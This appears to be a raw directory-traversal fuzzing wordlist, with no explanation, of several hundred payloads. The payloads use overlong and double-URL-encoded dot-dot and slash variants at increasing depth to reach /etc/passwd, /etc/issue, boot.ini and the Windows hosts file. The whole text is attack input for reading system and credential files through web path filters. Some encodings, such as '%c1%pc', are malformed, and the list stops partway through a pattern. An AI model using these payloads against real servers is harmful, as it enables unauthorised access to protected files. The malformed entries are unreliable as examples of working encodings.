-%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fpasswd -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fpasswd -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fpasswd -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cpasswd -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cetc0x5cissue -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cboot.ini -%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5c%c0%ee%c0%ee0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fpasswd -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fetc%252fissue -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fboot.ini -%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252f%c0%ee%c0%ee%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cpasswd -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cetc%255cissue -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cboot.ini -%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255c%c0%ee%c0%ee%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fpasswd -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fetc%c0%2fissue -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fboot.ini -%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2f%c0%ee%c0%ee%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afpasswd -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afetc%c0%afissue -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afboot.ini -%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%af%c0%ee%c0%ee%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cpasswd -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cetc%c0%5cissue -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cboot.ini -%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5c%c0%ee%c0%ee%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cpasswd -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cetc%c1%9cissue -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cboot.ini -%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9c%c0%ee%c0%ee%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pcetc%c1%pcissue -%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcissue -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcissue -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcissue -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcissue 